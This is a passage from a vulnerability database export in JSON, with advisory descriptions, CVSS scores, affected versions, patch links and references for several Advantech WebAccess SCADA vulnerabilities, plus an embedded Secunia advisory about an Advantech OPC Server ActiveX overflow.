"64dacb3e-2351-11e6-abef-000c29c66e3d", "ident": null }, { "db": "ZDI", "id": "ZDI-16-125", "ident": null }, { "db": "ZDI", "id": "ZDI-16-122", "ident": null }, { "db": "ZDI", "id": "ZDI-16-126", "ident": null }, { "db": "ZDI", "id": "ZDI-16-124", "ident": null }, { "db": "ZDI", "id": "ZDI-16-123", "ident": null }, { "db": "CNVD", "id": "CNVD-2016-00431", "ident": null }, { "db": "VULHUB", "id": "VHN-88365", "ident": null }, { "db": "BID", "id": "80745", "ident": null }, { "db": "JVNDB", "id": "JVNDB-2016-001285", "ident": null }, { "db": "CNNVD", "id": "CNNVD-201601-328", "ident": null }, { "db": "NVD", "id": "CVE-2016-0855", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2016-01-25T00:00:00", "db": "IVD", "id": "64dacb3e-2351-11e6-abef-000c29c66e3d", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-125", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-122", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-126", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-124", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-123", "ident": null }, { "date": "2016-01-25T00:00:00", "db": "CNVD", "id": "CNVD-2016-00431", "ident": null }, { "date": "2016-01-15T00:00:00", "db": "VULHUB", "id": "VHN-88365", "ident": null }, { "date": "2016-01-14T00:00:00", "db": "BID", "id": "80745", "ident": null }, { "date": "2016-01-26T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-001285", "ident": null }, { "date": "2016-01-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201601-328", "ident": null }, { "date": "2016-01-15T03:59:17.357000", "db": "NVD", "id": "CVE-2016-0855", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-125", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-122", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-126", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-124", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-123", "ident": null }, { "date": "2016-01-25T00:00:00", "db": "CNVD", "id": "CNVD-2016-00431", "ident": null }, { "date": "2016-12-03T00:00:00", "db": "VULHUB", "id": "VHN-88365", "ident": null }, { "date": "2016-01-14T00:00:00", "db": "BID", "id": "80745", "ident": null }, { "date": "2016-01-26T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-001285", "ident": null }, { "date": "2016-01-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201601-328", "ident": null }, { "date": "2024-11-21T02:42:30.897000", "db": "NVD", "id": "CVE-2016-0855", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201601-328" } ], "trust": 0.6 }, "title": { "_id": null, "data": "Advantech WebAccess Directory Traversal Vulnerability", "sources": [ { "db": "IVD", "id": "64dacb3e-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00431" }, { "db": "CNNVD", "id": "CNNVD-201601-328" } ], "trust": 1.4 }, "type": { "_id": null, "data": "Path traversal", "sources": [ { "db": "IVD", "id": "64dacb3e-2351-11e6-abef-000c29c66e3d" }, { "db": "CNNVD", "id": "CNNVD-201601-328" } ], "trust": 0.8 } }
var-202005-0338
Vulnerability from variot
Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. An out-of-bounds vulnerability exists that may allow access to unauthorized data. Advantech WebAccess Node Exists in an out-of-bounds read vulnerability.Information may be obtained. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Advantech WebAccess/SCADA. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of IOCTL 0x00002722 in ViewSrv.dll. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of Administrator. Advantech WebAccess is a browser-based SCADA software package for monitoring, data acquisition, and visualization. It is used to automate complex industrial processes when remote operation is required
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": "eq", "trust": 1.9, "vendor": "advantech", "version": "9.0.0" }, { "_id": null, "model": "webaccess/scada", "scope": null, "trust": 1.4, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "8.4.4" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "8.4.4" }, { "_id": null, "model": "webaccess node", "scope": "gte", "trust": 0.6, "vendor": "advantech", "version": "8.4.4" }, { "_id": null, "model": "webaccess node", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "9.0.0" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.4, "vendor": "webaccess", "version": "*" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.4, "vendor": "webaccess", "version": "9.0.0" } ], "sources": [ { "db": "IVD", "id": "0c0a4c5a-b413-4eb0-98c1-1acc2309ca38" }, { "db": "IVD", "id": "2cd25065-fdf0-47db-8723-f8fa644ff39f" }, { "db": "ZDI", "id": "ZDI-20-628" }, { "db": "ZDI", "id": "ZDI-20-630" }, { "db": "CNVD", "id": "CNVD-2020-29738" }, { "db": "VULMON", "id": "CVE-2020-12018" }, { "db": "JVNDB", "id": "JVNDB-2020-005145" }, { "db": "NVD", "id": "CVE-2020-12018" } ] }, "configurations": { "_id": null, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2020-005145" } ] }, "credits": { "_id": null, "data": "Z0mb1E", "sources": [ { "db": "ZDI", "id": "ZDI-20-628" }, { "db": "ZDI", "id": "ZDI-20-630" } ], "trust": 1.4 }, "cve": "CVE-2020-12018", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2020-12018", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 1.1, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "None", "baseScore": 5.0, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "JVNDB-2020-005145", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.8, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2020-29738", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "0c0a4c5a-b413-4eb0-98c1-1acc2309ca38", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "2cd25065-fdf0-47db-8723-f8fa644ff39f", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-164654", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "ZDI", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2020-12018", "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.4, "userInteraction": "NONE", "vectorString": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0" }, { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2020-12018", "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "None", "baseScore": 7.5, "baseSeverity": "High", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "JVNDB-2020-005145", "impactScore": null, "integrityImpact": "None", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0" } ], "severity": [ { "author": "ZDI", "id": "CVE-2020-12018", "trust": 1.4, "value": "HIGH" }, { "author": "nvd@nist.gov", "id": "CVE-2020-12018", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "JVNDB-2020-005145", "trust": 0.8, "value": "High" }, { "author": "CNVD", "id": "CNVD-2020-29738", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-202005-292", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "0c0a4c5a-b413-4eb0-98c1-1acc2309ca38", "trust": 0.2, "value": "HIGH" }, { "author": "IVD", "id": "2cd25065-fdf0-47db-8723-f8fa644ff39f", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-164654", "trust": 0.1, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2020-12018", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "0c0a4c5a-b413-4eb0-98c1-1acc2309ca38" }, { "db": "IVD", "id": "2cd25065-fdf0-47db-8723-f8fa644ff39f" }, { "db": "ZDI", "id": "ZDI-20-628" }, { "db": "ZDI", "id": "ZDI-20-630" }, { "db": "CNVD", "id": "CNVD-2020-29738" }, { "db": "VULHUB", "id": "VHN-164654" }, { "db": "VULMON", "id": "CVE-2020-12018" }, { "db": "JVNDB", "id": "JVNDB-2020-005145" }, { "db": "CNNVD", "id": "CNNVD-202005-292" }, { "db": "NVD", "id": "CVE-2020-12018" } ] }, "description": { "_id": null, "data": "Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. An out-of-bounds vulnerability exists that may allow access to unauthorized data. Advantech WebAccess Node Exists in an out-of-bounds read vulnerability.Information may be obtained. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Advantech WebAccess/SCADA. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of IOCTL 0x00002722 in ViewSrv.dll. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of Administrator. Advantech WebAccess is a browser-based SCADA software package for monitoring, data acquisition, and visualization. It is used to automate complex industrial processes when remote operation is required", "sources": [ { "db": "NVD", "id": "CVE-2020-12018" }, { "db": "JVNDB", "id": "JVNDB-2020-005145" }, { "db": "ZDI", "id": "ZDI-20-628" }, { "db": "ZDI", "id": "ZDI-20-630" }, { "db": "CNVD", "id": "CNVD-2020-29738" }, { "db": "IVD", "id": "0c0a4c5a-b413-4eb0-98c1-1acc2309ca38" }, { "db": "IVD", "id": "2cd25065-fdf0-47db-8723-f8fa644ff39f" }, { "db": "VULHUB", "id": "VHN-164654" }, { "db": "VULMON", "id": "CVE-2020-12018" } ], "trust": 3.96 }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2020-12018", "trust": 5.0 }, { "db": "ICS CERT", "id": "ICSA-20-128-01", "trust": 3.2 }, { "db": "ZDI", "id": "ZDI-20-628", "trust": 2.5 }, { "db": "ZDI", "id": "ZDI-20-630", "trust": 1.4 }, { "db": "CNVD", "id": "CNVD-2020-29738", "trust": 1.1 }, { "db": "CNNVD", "id": "CNNVD-202005-292", "trust": 1.1 }, { "db": "JVN", "id": "JVNVU93292753", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2020-005145", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-9903", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-9896", "trust": 0.7 }, { "db": "AUSCERT", "id": "ESB-2020.1646", "trust": 0.6 }, { "db": "NSFOCUS", "id": "47308", "trust": 0.6 }, { "db": "IVD", "id": "0C0A4C5A-B413-4EB0-98C1-1ACC2309CA38", "trust": 0.2 }, { "db": "IVD", "id": "2CD25065-FDF0-47DB-8723-F8FA644FF39F", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-164654", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2020-12018", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "0c0a4c5a-b413-4eb0-98c1-1acc2309ca38" }, { "db": "IVD", "id": "2cd25065-fdf0-47db-8723-f8fa644ff39f" }, { "db": "ZDI", "id": "ZDI-20-628" }, { "db": "ZDI", "id": "ZDI-20-630" }, { "db": "CNVD", "id": "CNVD-2020-29738" }, { "db": "VULHUB", "id": "VHN-164654" }, { "db": "VULMON", "id": "CVE-2020-12018" }, { "db": "JVNDB", "id": "JVNDB-2020-005145" }, { "db": "CNNVD", "id": "CNNVD-202005-292" }, { "db": "NVD", "id": "CVE-2020-12018" } ] }, "id": "VAR-202005-0338", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "0c0a4c5a-b413-4eb0-98c1-1acc2309ca38" }, { "db": "IVD", "id": "2cd25065-fdf0-47db-8723-f8fa644ff39f" }, { "db": "CNVD", "id": "CNVD-2020-29738" }, { "db": "VULHUB", "id": "VHN-164654" } ], "trust": 1.679503486666667 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 1.0 } ], "sources": [ { "db": "IVD", "id": "0c0a4c5a-b413-4eb0-98c1-1acc2309ca38" }, { "db": "IVD", "id": "2cd25065-fdf0-47db-8723-f8fa644ff39f" }, { "db": "CNVD", "id": "CNVD-2020-29738" } ] }, "last_update_date": "2024-11-23T21:59:18.487000Z", "patch": { "_id": null, "data": [ { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 1.4, "url": "https://www.us-cert.gov/ics/advisories/icsa-20-128-36" }, { "title": "Top Page", "trust": 0.8, "url": "https://www.advantech.com/" }, { "title": "Patch for Advantech WebAccess Node out-of-bounds reading vulnerability", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/218843" } ], "sources": [ { "db": "ZDI", "id": "ZDI-20-628" }, { "db": "ZDI", "id": "ZDI-20-630" }, { "db": "CNVD", "id": "CNVD-2020-29738" }, { "db": "JVNDB", "id": "JVNDB-2020-005145" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-125", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-164654" }, { "db": "JVNDB", "id": "JVNDB-2020-005145" }, { "db": "NVD", "id": "CVE-2020-12018" } ] }, "references": { "_id": null, "data": [ { "trust": 3.8, "url": "https://www.us-cert.gov/ics/advisories/icsa-20-128-01" }, { "trust": 1.8, "url": "https://www.zerodayinitiative.com/advisories/zdi-20-628/" }, { "trust": 1.4, "url": "https://www.us-cert.gov/ics/advisories/icsa-20-128-36" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12018" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-12018" }, { "trust": 0.8, "url": "https://jvn.jp/vu/jvnvu93292753/" }, { "trust": 0.7, "url": "https://www.zerodayinitiative.com/advisories/zdi-20-630/" }, { "trust": 0.6, "url": "http://www.nsfocus.net/vulndb/47308" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2020.1646/" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/125.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/181601" } ], "sources": [ { "db": "ZDI", "id": "ZDI-20-628" }, { "db": "ZDI", "id": "ZDI-20-630" }, { "db": "CNVD", "id": "CNVD-2020-29738" }, { "db": "VULHUB", "id": "VHN-164654" }, { "db": "VULMON", "id": "CVE-2020-12018" }, { "db": "JVNDB", "id": "JVNDB-2020-005145" }, { "db": "CNNVD", "id": "CNNVD-202005-292" }, { "db": "NVD", "id": "CVE-2020-12018" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "0c0a4c5a-b413-4eb0-98c1-1acc2309ca38", "ident": null }, { "db": "IVD", "id": "2cd25065-fdf0-47db-8723-f8fa644ff39f", "ident": null }, { "db": "ZDI", "id": "ZDI-20-628", "ident": null }, { "db": "ZDI", "id": "ZDI-20-630", "ident": null }, { "db": "CNVD", "id": "CNVD-2020-29738", "ident": null }, { "db": "VULHUB", "id": "VHN-164654", "ident": null }, { "db": "VULMON", "id": "CVE-2020-12018", "ident": null }, { "db": "JVNDB", "id": "JVNDB-2020-005145", "ident": null }, { "db": "CNNVD", "id": "CNNVD-202005-292", "ident": null }, { "db": "NVD", "id": "CVE-2020-12018", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2020-05-07T00:00:00", "db": "IVD", "id": "0c0a4c5a-b413-4eb0-98c1-1acc2309ca38", "ident": null }, { "date": "2020-05-07T00:00:00", "db": "IVD", "id": "2cd25065-fdf0-47db-8723-f8fa644ff39f", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-628", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-630", "ident": null }, { "date": "2020-05-25T00:00:00", "db": "CNVD", "id": "CNVD-2020-29738", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "VULHUB", "id": "VHN-164654", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "VULMON", "id": "CVE-2020-12018", "ident": null }, { "date": "2020-06-08T00:00:00", "db": "JVNDB", "id": "JVNDB-2020-005145", "ident": null }, { "date": "2020-05-07T00:00:00", "db": "CNNVD", "id": "CNNVD-202005-292", "ident": null }, { "date": "2020-05-08T12:15:11.317000", "db": "NVD", "id": "CVE-2020-12018", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-628", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-630", "ident": null }, { "date": "2020-05-25T00:00:00", "db": "CNVD", "id": "CNVD-2020-29738", "ident": null }, { "date": "2020-05-11T00:00:00", "db": "VULHUB", "id": "VHN-164654", "ident": null }, { "date": "2020-05-11T00:00:00", "db": "VULMON", "id": "CVE-2020-12018", "ident": null }, { "date": "2020-06-08T00:00:00", "db": "JVNDB", "id": "JVNDB-2020-005145", "ident": null }, { "date": "2021-01-04T00:00:00", "db": "CNNVD", "id": "CNNVD-202005-292", "ident": null }, { "date": "2024-11-21T04:59:07.480000", "db": "NVD", "id": "CVE-2020-12018", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-202005-292" } ], "trust": 0.6 }, "title": { "_id": null, "data": "Advantech WebAccess Node Out-of-bounds read vulnerability in", "sources": [ { "db": "JVNDB", "id": "JVNDB-2020-005145" } ], "trust": 0.8 }, "type": { "_id": null, "data": "Buffer error", "sources": [ { "db": "IVD", "id": "0c0a4c5a-b413-4eb0-98c1-1acc2309ca38" }, { "db": "IVD", "id": "2cd25065-fdf0-47db-8723-f8fa644ff39f" }, { "db": "CNNVD", "id": "CNNVD-202005-292" } ], "trust": 1.0 } }
var-201202-0223
Vulnerability from variot
Buffer overflow in an ActiveX control in bwocxrun.ocx in Advantech/BroadWin WebAccess before 7.0 allows remote attackers to execute arbitrary code by leveraging the ability to write arbitrary content to any pathname. Advantech Advantech specializes in network computer and network automation, providing more than 450 products including industrial data acquisition, automation software, computer platforms, Advantech industrial computers, computer motherboards and accessories. Advantech/BroadWin SCADA WebAccess is a fully browser-based Human Machine Interface (HMI) and Monitoring and Data Acquisition (SCADA) software. Advantech WebAccess is prone to multiple remote vulnerabilities. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, execute arbitrary code gain access to sensitive information, cause a denial-of-service condition. Other attacks are possible. ----------------------------------------------------------------------
Ovum says ad hoc tools are out-dated. The best practice approach? Fast vulnerability intelligence, threat handling, and setup in one tool.
Read the new report on the Secunia VIM: http://secunia.com/products/corporate/vim/ovum_2011_request/
TITLE: Advantech OPC Server ADAM ActiveX Control Buffer Overflow Vulnerability
SECUNIA ADVISORY ID: SA46775
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46775/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=46775
RELEASE DATE: 2011-11-07
DISCUSS ADVISORY: http://secunia.com/advisories/46775/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/46775/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=46775
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: A vulnerability has been reported in Advantech OPC Server, which can be exploited by malicious people to compromise a user's system.
The vulnerability is reported in the following components: * Advantech ADAM OPC Server versions prior to V3.01.012. * Advantech Modbus RTU OPC Server versions prior to V3.01.010. * Advantech Modbus TCP OPC Server versions prior to V3.01.010.
SOLUTION: Reportedly a patch has been released. Contact the vendor for further information.
PROVIDED AND/OR DISCOVERED BY: ICS-CERT credits Security Research and Service Institute Information and Communication Security Technology Center (ICST).
ORIGINAL ADVISORY: ICS-CERT: http://www.us-cert.gov/control_systems/pdf/ICSA-11-279-01.pdf
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201202-0223", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "5.0" }, { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "6.0" }, { "model": "broadwin webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "7.0" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "broadwin", "version": "7.0" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "advantech", "version": "7.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "6.0" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "advantech webaccess", "version": "5.0" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "advantech webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "1a349328-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0671" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001561" }, { "db": "CNNVD", "id": "CNNVD-201202-419" }, { "db": "NVD", "id": "CVE-2012-0243" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:broadwin:webaccess", "vulnerable": true }, { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001561" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Sense Vulnerability Coordination Team, Greg MacManus of iSIGHT Partners, Kuang-Chun Hung of Security Research and Service Institute-Information and Communication Security Technology Center (ICST), Luigi Auriemma, and\nSnake (alias).", "sources": [ { "db": "BID", "id": "52051" } ], "trust": 0.3 }, "cve": "CVE-2012-0243", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CVE-2012-0243", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 1.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { 